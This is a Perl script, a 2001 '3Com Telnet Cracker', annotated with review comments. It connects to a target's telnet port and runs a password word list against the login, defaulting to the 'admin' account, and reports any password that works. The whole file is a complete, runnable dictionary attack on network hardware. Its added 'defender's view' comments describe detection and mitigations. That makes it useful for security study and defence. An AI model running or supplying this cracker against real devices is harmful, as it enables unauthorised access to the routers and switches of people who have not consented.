#!/usr/bin/perl -w

########################################################
#                                                      #
# 3Com Telnet Cracker v0.1b                            #
# -------------------------                            # 
#                                                      #
# Telnet implementation according to RFC 854           #
#                                                      #
# written 2001 by Siberian [www.sentry-labs.com]       #
#                                                      #
# Tested with:                                         # 
# Active Perl (Windows NT)                             # 
# Perl 5.stable (Slackware 3.6 & 7.1)                  # 
#                                                      # 
#    This Software is published under GPL v2           # 
#                                                      #
#         FOR EDUCATIONAL PURPOSE ONLY!                #
#                                                      #
# SRL can't be held responsible for any damage caused  #
# by the software, directly or indirectly to anything  #
# or anyone.                                           # 
#                                                      #
########################################################
     

use Socket;

# guesspass - run the word list against the already-connected telnet session.
#
# Takes no arguments and works entirely on package globals set up by the
# main program: SOCK (connected socket), FILE1 (open word list), $userf
# (user name) and $ol (last byte read from the socket). On the first "M"
# marker it prints the current word and ends the whole program with
# exit 0; when the word list is exhausted it prints a failure message and
# returns to the caller.
#
# Session state is tracked through a single byte: the incoming stream is
# scanned until an "L", "P" or "M" is read.
# NOTE(review): these are presumably the first letters of the device's
# login prompt, password prompt and post-login text - the source does not
# say; confirm against the device's actual output.
#
# Review notes:
#  - The result of recv() is never checked and the scan loops end only
#    when one of the three marker bytes arrives; nothing here handles a
#    closed or silent connection.
#  - chop() removes the last character unconditionally, whatever it is.
#  - The success message prints $passwd after CR LF has been appended.
#  - Defender's view: every guess is a plain-text user name / password
#    exchange on one long-lived TCP connection (port 23 is set by the main
#    program), so a long run of failed logins from a single peer is the
#    observable signal. Login-attempt limits or lockout on the device, a
#    non-default admin password, and an encrypted management protocol in
#    place of telnet are the usual mitigations.
sub guesspass {

# $i counts the prompt/response steps taken for the current word (1 or 2).
$i=1;
# Keep the bare user name for the final report, then append CR LF so that
# $userf can be sent as a complete telnet line.
$userh = $userf;
$userf = join '', $userf, chr(13), chr(10);

# Skip incoming bytes one at a time until the first marker byte shows up.
recv(SOCK,$ol,1,0);
while(($ol ne "L") && ($ol ne "P") && ($ol ne "M")){
    recv(SOCK,$ol,1,0);
}

# One pass of the outer loop per line of the word list.
while(defined($passwd = <FILE1>)) {
   # Drop the last character of the line (expected to be the newline).
   chop($passwd);
   # Progress indicator: one dot per word tried.
   print ".";
# At most two steps per word: answer an "L" marker with the user name,
# answer a "P" marker with the word, then look at the next marker.
while($i != 3) {
   if($ol eq "L"){ 
    send(SOCK,$userf,0); 
   }
   if($ol eq "P") { 
    # CR LF is appended to $passwd in place; if "P" is seen in both steps
    # it is appended a second time before the word is sent again.
    $passwd = join '', $passwd, chr(13), chr(10);
    send(SOCK,$passwd,0); 
   }
   # Read up to the next marker byte to learn how the device reacted.
   recv(SOCK,$ol,1,0);
   while(($ol ne "L") && ($ol ne "P") && ($ol ne "M")){
    recv(SOCK,$ol,1,0);
   }
   # "M" is treated as a successful login: report and stop the program.
   if($ol eq "M") {
     print "\n\nPassword for $userh is $passwd\n";
     exit 0;
   }
$i++
}
# Reset the step counter for the next word.
$i=1;
}
# Word list exhausted without ever seeing the "M" marker.
print "\n\nIt's sad but true, you failed.\n";
}


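# Main program: banner, argument parsing, one TCP connection to the telnet
# service, then the word-list run in guesspass(). Every variable is a
# package global because guesspass() reads $userf, $ol, SOCK and FILE1
# directly instead of taking parameters.
#
# Defender's view: all traffic produced below is a single unencrypted
# session to TCP port 23, so the attempts are visible to network monitoring
# and to any login-failure logging the target device provides.
print "\n3Com Hardware Telnet Login Cracker, written by Siberian \- Sentry Research Labs\n\n";
print "Get the latest Version at www.sentry-labs.com\n\n";

# Positional arguments: target host, word-list file, optional user name.
# A missing (or false, e.g. "0") argument ends the program with the usage
# text.
$remote = shift || die "usage: ./crack3com.pl [target host] [dictionary] (username)";
$passf = shift || die "usage: ./crack3com.pl [target host] [dictionary] (username)";
# "admin" is the account tried when no user name is given.
$userf = shift || "admin";

# Resolve the target and connect a TCP stream socket to port 23 (telnet).
$iaddr = inet_aton($remote) or die "No target host computer found!";
$paddr = sockaddr_in(23, $iaddr);
$prot = getprotobyname('tcp');
socket(SOCK, AF_INET, SOCK_STREAM, $prot) or die "socket: $!";
connect(SOCK, $paddr) || die "Can't connect to target host!";

# Three-argument open with an explicit read mode. The path comes straight
# from the command line, and the two-argument form would interpret mode
# characters at its start or end (redirection, pipe) rather than treating
# the whole string as a file name - a path such as ">file" would truncate
# that file and "cmd |" would run a command.
open(FILE1, '<', $passf) || die "Can't open Password list!";

# Read one byte from the service, then send LF CR LF before the run starts.
# NOTE(review): presumably this nudges the device into printing its login
# prompt - the source does not say; confirm against the device.
recv(SOCK,$ol,1,0);
$bs = join '', chr(10),chr(13),chr(10);
send(SOCK, $bs, 0);

# guesspass() exits the program itself on success; it returns here only
# when the word list is exhausted.
guesspass();

close(FILE1);
close(SOCK);
exit 0;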